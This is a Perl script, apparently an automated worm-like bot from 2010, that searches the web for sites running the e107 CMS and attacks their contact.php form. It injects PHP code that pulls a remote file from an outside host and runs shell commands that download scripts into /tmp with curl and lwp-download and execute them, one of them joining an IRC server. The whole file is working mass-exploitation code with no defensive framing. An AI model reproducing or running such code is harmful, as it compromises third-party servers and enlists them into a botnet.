#!/usr/bin/perl
my $aboutbot=’
################################
# CASPER RFI CRACK Bot v1.1 #
# By Kiss_Me Alert jan 2010. #
# Casper_kae@yahoo.com #
################################
‘;
print($aboutbot);
use strict;
use Socket;
use IO::Select;
use IO::Socket::INET;
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);
my $dork = “e107”;
my $e107sprd = “include(‘http://lshungary.hu/casper/casper.txt?’)”;
my $e107cmdsp= “‘cd /var/tmp;cd /tmp;lwp-download http://lshungary.hu/casper/iso.txt -O iso.txt;curl -O http://lshungary.hu/casper/iso.txt -O iso.txt;perl iso.txt irc.allnetwork.org'”;
my $e107sprd2= “passthru(“.$e107cmdsp.”);exec(“.$e107cmdsp.”);system(“.$e107cmdsp.”);shell_exec(“.$e107cmdsp.”);”;
my $e107cmdsp2= “‘cd /var/tmp;cd /tmp;lwp-download http://lshungary.hu/casper/cre107.txt -O cre107.txt;curl -O http://lshungary.hu/casper/cre107.txt -O cre107.txt;perl cre107.txt'”;
my $e107sprd3= “passthru(“.$e107cmdsp2.”);exec(“.$e107cmdsp2.”);system(“.$e107cmdsp2.”);shell_exec(“.$e107cmdsp2.”);”;
my $keluar = 0;
cr_src();
sub cr_src {
my @domini = SiteDomains();
foreach my $Domains(@domini){
alltheweb_search(“*.”.$Domains.” “.$dork);
}
}
sub alltheweb_search {
my $term = shift;
my $inc = 10;
my $maxpages = 1024;
my @links;
for (my $pagenum = 0;$pagenum <= $maxpages;$pagenum += $inc) {
my $url = “http://www.alltheweb.com/search?cat=web&cs=iso88591&rys=0&itag=crv&_sb_lang=any&ocjp=1&q=” .$term. “&o=” .$pagenum;
my $query = send_query($url);
while ($query =~ m!<a href=”.*?(\/\*\*)(.*?)” >!g) {
if ($1 !~ m!yahoo!) {
my $rawlink = $2;
my @process=process_links($rawlink);
push(@links, @process);
}
} sleep(1);
} return @links;
}
sub send_query {
my $url = shift;
my $ua = LWP::UserAgent->new or die;
$ua->agent(‘Casper Bot Search’);
$ua->timeout(10);
my $req = HTTP::Request->new(GET => $url);
my $res = $ua->request($req);
print $url . “\n”;
if($res->is_success) {
return $res->content;
} else {
return $res->status_line;
}
}
sub process_links() {
my @links = shift;
my @xplurl;
my $url;
foreach my $inc (@links) {
$inc =~ s!(https?:\/\/[^\/]+\/?)[^\s]+!$1!;
$inc =~ s!%3a!:!gi;
$inc =~ s!%3f!\/!gi;
$url = $inc . “contact.php\n”;
push(@xplurl,$url);
} exploit_host(@xplurl);exploit_host2(@xplurl);exploit_host3(@xplurl);
}
sub exploit_host() {
my @host = shift;
foreach my $inc (@host) {
my $ua = LWP::UserAgent->new or die;
$ua->agent(‘Casper Bot Search’);
$ua->timeout(15);
my $req = HTTP::Request->new(POST => $inc);
$req->content_type(‘application/x-www-form-urlencoded’);
$req->content(“send-contactus=1&author_name=%5Bphp%5D” .$e107sprd. “%3Bdie%28%29%3B%5B%2Fphp%5D”);
my $res = $ua->request($req);
print $inc;
my $cont = $res->content;
} sleep(1);
}
sub exploit_host2() {
my @host = shift;
foreach my $inc (@host) {
my $ua = LWP::UserAgent->new or die;
$ua->agent(‘Casper Bot Search’);
$ua->timeout(15);
my $req = HTTP::Request->new(POST => $inc);
$req->content_type(‘application/x-www-form-urlencoded’);
$req->content(“send-contactus=1&author_name=%5Bphp%5D” .$e107sprd2. “%3Bdie%28%29%3B%5B%2Fphp%5D”);
my $res = $ua->request($req);
print $inc;
my $cont = $res->content;
} sleep(1);
}
sub exploit_host3() {
my @host = shift;
foreach my $inc (@host) {
my $ua = LWP::UserAgent->new or die;
$ua->agent(‘Casper Bot Search’);
$ua->timeout(15);
my $req = HTTP::Request->new(POST => $inc);
$req->content_type(‘application/x-www-form-urlencoded’);
$req->content(“send-contactus=1&author_name=%5Bphp%5D” .$e107sprd3. “%3Bdie%28%29%3B%5B%2Fphp%5D”);
my $res = $ua->request($req);
print $inc;
my $cont = $res->content;
} sleep(1);
}
sub SiteDomains {
my @dom = (“ru”,”pl”,”biz”,”tv”,”info”,”org”,”net”,”ae”,”ar”,”at”,”au”,”be”,”br”,”ca”,”ch”,”cl”,”de”,”dk”,”fi”,”fr”,”gr”,”hk”,
“ie”,”il”,”it”,”jp”,”kr”,”lt”,”lv”,”nl”,”pa”,”pe”,”pl”,”pt”,”ru”,”sg”,
“tr”,”tw”,”ua”,”uk”,”hu”,”af”,”ae”,”ag”,”ai”,”am”,”ar”,”as”,
“at”,”au”,”az”,”ba”,”bd”,”be”,”bg”,”bh”,”bi”,”bn”,”bo”,”bn”,”bs”,”bw”,
“by”,”bz”,”ca”,”cd”,”cg”,”ch”,”ci”,”ck”,”cl”,”cn”,”co”,”cr”,”cu”,”cz”,”de”,
“dj”,”dk”,”dm”,”do”,”ec”,”ee”,”eg”,”es”,”et”,”fi”,”fj”,”fm”,”fr”,”ge”,”gg”,
“gi”,”gl”,”gm”,”gp”,”gr”,”gt”,”gy”,”hk”,”hn”,”hr”,”ht”,”hu”,”id”,”ie”,”il”,
“im”,”in”,”is”,”it”,”je”,”jm”,”jo”,”jp”,”ke”,”kh”,”ki”,”kg”,”kr”,”kz”,”la”,
“li”,”lk”,”ls”,”lt”,”lu”,”lv”,”ly”,”ma”,”md”,”mn”,”ms”,”mt”,”mu”,”mv”,”mw”,”mx”,
“my”,”na”,”nf”,”ng”,”ni”,”nl”,”no”,”np”,”nr”,”nu”,”nz”,”om”,”pa”,
“pe”,”ph”,”pk”,”pl”,”pn”,”pr”,”pt”,”py”,”qa”,”ro”,”ru”,”rw”,”sa”,”sb”,
“sc”,”se”,”sg”,”sh”,”si”,”sk”,”sn”,”sm”,”st”,”sv”,”th”,”tj”,”tk”,”tm”,”to”,”tp”,”tr”,
“tt”,”tw”,”ua”,”ug”,”uk”,”uy”,”uz”,”vc”,”ve”,”vg”,”vi”,”vn”,”vu”,”ws”,
“yu”,”za”,”zm”,”zw”);
return @dom;
}